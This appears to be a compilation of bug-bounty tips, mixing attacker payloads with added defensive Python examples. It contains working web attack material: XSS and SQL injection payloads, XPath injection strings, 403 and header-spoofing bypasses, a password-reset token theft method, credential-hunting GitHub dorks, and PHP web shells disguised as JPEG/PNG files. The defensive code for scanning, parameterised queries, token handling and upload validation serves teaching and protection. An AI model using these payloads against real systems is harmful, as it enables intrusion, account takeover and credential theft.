The new search allows for regex, which means brand **new** regex GitHub Dorks are possible!
Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/
#infosec #cybersecurite #bugbountytip
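The regex dorks above search public code for connection strings with embedded credentials. The defensive counterpart is to catch the same pattern before it is pushed. The following is an added example, not code from the original post: a small pre-commit style scanner that flags and redacts `scheme://user:password@host` URLs. The scheme list and the sample configuration text are constructed assumptions.

```python
import re

# Matches URLs that carry a user:password pair before the host, the shape the
# GitHub regex dorks look for. The scheme list is an assumption; extend it.
CRED_URL_RE = re.compile(
    r"\b(?P<scheme>ssh|ftp|sftp|https?|mysql|postgres(?:ql)?|mongodb|redis)://"
    r"(?P<user>[^\s:/@]+):(?P<secret>[^\s/@]+)@(?P<host>[^\s/:\"']+)",
    re.IGNORECASE,
)


def find_embedded_credentials(text):
    """Return (line_number, scheme, user, host) for every credentialed URL found.

    The secret itself is deliberately not returned so findings can be logged.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CRED_URL_RE.finditer(line):
            hits.append((lineno, m.group("scheme").lower(), m.group("user"), m.group("host")))
    return hits


def redact(text):
    """Replace the password component of each match with *** for safe reporting."""
    return CRED_URL_RE.sub(
        lambda m: f"{m.group('scheme')}://{m.group('user')}:***@{m.group('host')}", text
    )


# Constructed sample file content; these are not real credentials.
SAMPLE = """\
# constructed sample config
DEPLOY_HOST = "ssh://deploy:Hunter2@build.example.com"
backup_url = 'ftp://backup:s3cret@files.example.com/daily'
docs = "https://docs.example.com/guide"   # no credentials, must not match
"""

if __name__ == "__main__":
    for lineno, scheme, user, host in find_embedded_credentials(SAMPLE):
        print(f"line {lineno}: {scheme} credentials for {user}@{host}")
    print(redact(SAMPLE))
```

Run it as a pre-commit hook over staged files; a non-empty result from `find_embedded_credentials` should block the commit, and `redact` gives you output that is safe to paste into a ticket.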
If you run a brute force and notice weird behaviours, like "/admin/" redirecting to /, always investigate these.
/admin/
/admin/../admin
//admin/
/Admin/
/admin;/
/Admin;/
/index.php/admin/
/admin/js/*.js
/admin/*brute*.ext
/admin../admin
//anything/admin/
#infosec
The best single #XSS vector you'll ever have! Payload:
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
1:- Use @fasthm00
2:- Import to burpsuite match and replace.
3:- Run gospider: gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
4:- The blind XSS payload will be added automatically by Burp and gospider.
Finally:- 4 BLIND XSS REPORTS.
Time-based SQLi with two payloads injected in the following headers:
1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR"
2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
#sqli #cybersecuritytips #infosecurity #bugbountytip
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
Get more detail about this 👇.
#bugbountyTips #bugbounty
Testing SQLi in APIs?
Always start from: Boolean-based >> Time-based
{"id":"56456"} -> OK
{"id":"56456 AND 1=1#"} -> OK
{"id":"56456 AND 1=2#"} -> OK
{"id":"56456 AND 1=3#"} -> ERROR
{"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC
#sqli #infosec #cybersecurity #bugbountytips
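The boolean-based probe above and the time-based header payloads in the earlier SQLi post both work for the same reason: a value taken from the request (a JSON field, a User-Agent, an X-Forwarded-For) is concatenated into SQL. The following is an added example, not code from either post, showing a string-built lookup next to a bound-parameter lookup with type validation, so the `AND 1=1` / `AND 1=2` difference that the tip relies on disappears. SQLite is used so it runs offline; it has no `#` comment marker (that is MySQL syntax) and no `sleep()`, so the probes below omit them. Table name, rows and function names are constructed.

```python
import sqlite3


def make_db():
    """In-memory table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(56456, "widget"), (56457, "gadget")])
    return conn


def lookup_vulnerable(conn, item_id):
    """The JSON value is pasted into the statement, so it becomes SQL."""
    sql = f"SELECT name FROM items WHERE id = {item_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, item_id):
    """Reject anything that is not a decimal string, then bind the integer.

    Bound parameters are sent as data, never parsed as SQL, so even if the
    type check were skipped the value could not change the query shape.
    """
    if not isinstance(item_id, str) or not item_id.isdigit():
        raise ValueError("id must be a decimal string")
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (int(item_id),))
    return [row[0] for row in rows]


def classify(conn, lookup, item_id):
    """Summarise the observable behaviour the way the tip does (OK / EMPTY / ERROR)."""
    try:
        rows = lookup(conn, item_id)
    except (sqlite3.Error, ValueError):
        return "ERROR"
    return "OK" if rows else "EMPTY"


if __name__ == "__main__":
    conn = make_db()
    for probe in ["56456", "56456 AND 1=1", "56456 AND 1=2", "56456'"]:
        print(f"{probe!r:22} vulnerable={classify(conn, lookup_vulnerable, probe):6} "
              f"hardened={classify(conn, lookup_hardened, probe)}")
```

With the vulnerable lookup the three probes give three different answers, which is exactly the oracle the tip describes; with the hardened lookup every non-numeric id is the same ERROR and the attacker learns nothing. The same rule applies to header values that end up in a query (logging the User-Agent, geolocating X-Forwarded-For): bind them, never format them in.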
Admin-Panel Bypass ⚔️
XPath Injection
```
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
```
Testing 403 bypass?
You found a /wp-admin with 403 status.
*) Bypass it using /wp-admin/setup-config.php?step=1
This will allow you to create a database.
From here, you can escalate it to any other big vulnerability:
#infosec #bugbountytips #cybersec
You can find deep subdomains without tools, using simple dorks like these: ⚡️
site:*.site.com -www
site:*.*.site.com -www
site:*.*.*.site.com -www
#infosec #cybersec #bugbounty
Account Takeover of every user
1) Go to forgot password
2) Capture the request in Burp
3) Change the Referer link into my Burp Collaborator link
4) Got an HTTP request with the password reset token link of a victim
#infosecurity #bugbountytips #CyberSec
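The takeover above works because the reset token travels in a URL that an attacker-influenced page can learn from (via the Referer, or via a host name the application took from the request). The following is an added example, not code from the original post, of the server-side pieces that close that off: the reset link is built from a configured base URL rather than any request header, the token is random, stored only as a hash, single-use and short-lived, and the reset page is served with a no-referrer policy so the token never leaks to third-party resources. `APP_BASE_URL`, `TOKEN_TTL` and the class name are constructed.

```python
import hashlib
import secrets
import time
from urllib.parse import urlencode

# Assumptions: the base URL comes from deployment config, never from Host,
# X-Forwarded-Host or Referer; tokens live for 15 minutes.
APP_BASE_URL = "https://app.example.com"
TOKEN_TTL = 15 * 60


class ResetStore:
    """Issues and redeems password-reset tokens, keeping only their hashes."""

    def __init__(self):
        self._tokens = {}  # sha256(token) -> (user_id, expiry_timestamp)

    def issue(self, user_id, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)          # 256 bits of CSPRNG output
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._tokens[digest] = (user_id, now + TOKEN_TTL)
        return token                               # the raw token is only ever sent to the user

    def redeem(self, token, now=None):
        """Return the user id once, then forget the token; None if unknown or expired."""
        now = time.time() if now is None else now
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._tokens.pop(digest, None)     # pop makes the token single-use
        if entry is None or entry[1] < now:
            return None
        return entry[0]


def reset_link(token):
    """Build the link from configuration; request headers are deliberately not consulted."""
    return f"{APP_BASE_URL}/reset?{urlencode({'token': token})}"


def reset_page_headers():
    """Response headers for the page that carries the token in its URL."""
    return {"Referrer-Policy": "no-referrer", "Cache-Control": "no-store"}


if __name__ == "__main__":
    store = ResetStore()
    t = store.issue("user-1")
    print(reset_link(t))
    print(store.redeem(t), store.redeem(t))   # second redeem is None
```

Because the link never depends on the incoming Host or Referer, changing those headers in Burp changes nothing about where the token is sent, and the no-referrer policy stops the reset page from handing the token to any resource it loads.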
How to find authentication bypass vulnerabilities.
Focus: I added headers. By @jae_hak99
Request
GET /delete?user=test HTTP/1.1
Response
HTTP/1.1 401 Unauthorized
Request
GET /delete?user=test HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 302 Found
#bugbounty
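The bypass above succeeds when the application lets a client-supplied header (X-Custom-IP-Authorization here, often X-Forwarded-For, X-Real-IP and similar) stand in for the real source address. The following is an added example, not code from the original post, of an authorization check that derives the client address from the TCP peer, honours X-Forwarded-For only when the peer is one of our own proxies, and logs any spoofable header it ignored. The trusted proxy range, the protected path list and the header list are constructed assumptions.

```python
from ipaddress import ip_address, ip_network

# Assumptions: our reverse proxies sit in 10.0.0.0/8 and append the client
# address to X-Forwarded-For; /delete is only ever called from localhost.
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]
LOCAL_ONLY_PATHS = ("/delete",)
# Headers some frameworks treat as the client IP; we never trust any of them.
SPOOFABLE_HEADERS = (
    "x-custom-ip-authorization", "x-originating-ip", "x-remote-ip",
    "x-remote-addr", "x-client-ip", "x-real-ip",
)


def effective_client_ip(peer_ip, headers):
    """Start from the socket peer; use X-Forwarded-For only behind a trusted proxy."""
    peer = ip_address(peer_ip)
    if any(peer in net for net in TRUSTED_PROXIES):
        xff = headers.get("x-forwarded-for", "")
        if xff:
            # The last entry is the one our proxy appended; earlier entries are
            # whatever the client chose to send and carry no trust.
            try:
                return ip_address(xff.split(",")[-1].strip())
            except ValueError:
                pass  # malformed header: fall back to the peer address
    return peer


def authorize(peer_ip, headers, path):
    """Return (status, reason) for a request to `path` from `peer_ip`."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    ignored = [h for h in SPOOFABLE_HEADERS if h in hdrs]
    client = effective_client_ip(peer_ip, hdrs)
    route = path.split("?", 1)[0]
    if route.startswith(LOCAL_ONLY_PATHS) and not client.is_loopback:
        reason = f"client {client} is not loopback"
        if ignored:
            reason += "; ignored spoofable headers: " + ", ".join(ignored)
        return 401, reason
    return 200, "ok"


if __name__ == "__main__":
    print(authorize("203.0.113.5", {"X-Custom-IP-Authorization": "127.0.0.1"}, "/delete?user=test"))
    print(authorize("127.0.0.1", {}, "/delete?user=test"))
```

The `ignored` list is worth emitting to your logs: a request from the internet carrying X-Custom-IP-Authorization or X-Real-IP is a cheap, high-signal detection for exactly the probing this tip describes.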
Find SSRF on all your huge target list via httpx:-
1:- Download
2:- Add on {target}
3:- Run httpx.
httpx -paths ssrf-parameters.txt -threads 200 -o ssrf.txt
4:- Screenshot the result
gowitness file -f ssrf.txt
#infosec
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload:
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
#bugbounty #infosecurity #cybersec
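The two files above pass a naive "does it start with JPEG/PNG magic bytes" check while still carrying PHP. The following is an added example, not code from the original post, of an upload validator that shows why magic bytes alone are not a defence: it checks the full signature (the four-byte PNG prefix used above is shorter than the real eight-byte signature), then scans the body for a PHP open tag. The sample byte strings are constructed and contain a harmless `echo` rather than the page's payload.

```python
import re

# Full file signatures; the PNG one is 8 bytes, not the 4 the polyglot trick uses.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Match the long open tag and the echo tag only: a bare "<?" would also hit
# the "<?xpacket" XMP metadata that real JPEGs legitimately contain.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def magic_matches(data, ext):
    return data.startswith(MAGIC[ext])


def contains_script(data):
    return PHP_TAG_RE.search(data) is not None


def validate_upload(data, declared_ext, max_bytes=5_000_000):
    """Return (accepted, reason). Every rejection names the failing check."""
    ext = declared_ext.lower().lstrip(".")
    if ext not in MAGIC:
        return False, "extension not allowed"
    if len(data) > max_bytes:
        return False, "too large"
    if not magic_matches(data, ext):
        return False, "magic bytes do not match extension"
    if contains_script(data):
        return False, "embedded server-side script tag"
    return True, "ok"


# Constructed samples (not real images): a JPEG-looking polyglot with a harmless
# PHP tag, the 4-byte PNG prefix trick, and a plain header with no script.
POLYGLOT_JPG = b"\xff\xd8\xff\xe0<?php echo 1; ?>."
SHORT_PNG = b"\x89PNG<?php echo 1; ?>."
BENIGN_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 16 + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob, ext in [("polyglot", POLYGLOT_JPG, "jpg"), ("short png", SHORT_PNG, "png"),
                            ("benign", BENIGN_JPG, "jpg")]:
        print(name, validate_upload(blob, ext))
```

Treat this as the first layer only: the durable fixes are to store uploads outside the web root (or on a host that never executes them), serve them with a fixed Content-Type, and re-encode images through an image library so that any trailing payload is discarded.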
Add to your list: #SQL #injection payload by @lu3ky13
1%27/**/%256fR/**/50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
Did you know the shortest #payload to achieve code execution in #PHP is only 15 bytes long? If you can inject it in a page on the site you will achieve remote code execution! This is really useful in #BugBounty or #pentest when you have a limited input size.
Thread 👇
E-mail address payloads 📓
The following payloads are all valid e-mail addresses that we can use for pentesting of not only web-based e-mail systems.
1/. XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
List of GitHub Dorks for bug bounties, like finding target files, languages, API keys, tokens, usernames, passwords, information using dates, extensions 📓
#infosec #cybersec #bugbountytips
403 Forbidden bypass 🫰
GET /admin = 403 Forbidden
GET /random-dir/../admin = 200 OK
Cloudflare IP Restriction bypass 🫰
GET /admin = Error 1006 (Cloudflare)
GET /admin? = 200 OK
#infosec #cybersec #bugbountytips
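The `/random-dir/../admin`, `/admin?` and (from the earlier brute-force post) `//admin/`, `/admin;/`, `/Admin/` variants all get through when the access rule is applied to the raw request line while the application resolves a different, normalised path. The following is an added example, not code from either post, of a canonicaliser that reduces a request path to one form before any prefix-based rule is evaluated: query and fragment are dropped, percent-encoding is undone twice, `;param` matrix segments are stripped, `..`, `.` and repeated slashes are resolved, and the result is lower-cased. The protected prefix list and the lower-casing (appropriate for case-insensitive back ends) are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Assumed protected prefixes (constructed); real deployments load them from config.
PROTECTED_PREFIXES = ("/admin",)


def canonical_path(raw_path):
    """Reduce a request path to one canonical form before any ACL decision."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]   # drop query and fragment
    for _ in range(2):                                  # undo single and double percent-encoding
        path = unquote(path)
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]  # strip ';param' matrix parameters
    path = "/".join(segments)
    path = "/" + path.lstrip("/")        # posixpath keeps a leading '//' (POSIX special case); we do not
    path = posixpath.normpath(path)      # resolves '.', '..' and repeated slashes; leading '..' is dropped
    return path.lower()


def is_protected(raw_path):
    """Prefix match on whole segments, so /administrator is not caught by /admin."""
    path = canonical_path(raw_path)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def decide(raw_path, is_admin):
    """403 for protected paths unless the caller is an admin, 200 otherwise."""
    return 200 if is_admin or not is_protected(raw_path) else 403


if __name__ == "__main__":
    for p in ["/admin", "/random-dir/../admin", "//admin/", "/Admin/", "/admin;/", "/admin?",
              "/x/%2e%2e/admin", "/%252e%252e/admin", "/administrator", "/index.php/admin/"]:
        print(f"{p:22} -> {canonical_path(p):20} protected={is_protected(p)}")
```

Note what the canonicaliser does not catch: `/index.php/admin/` (PHP path info) and `//anything/admin/` canonicalise to paths that no `/admin` prefix matches, yet the application may still route them to the admin code. That is the argument for enforcing authorization inside the route handler itself rather than in a path-matching front layer; the canonicaliser only removes the cheap bypasses from whatever front-layer rule you keep.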
Here's a small #XSS list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on:
- URL query, fragment & path;
- all input fields.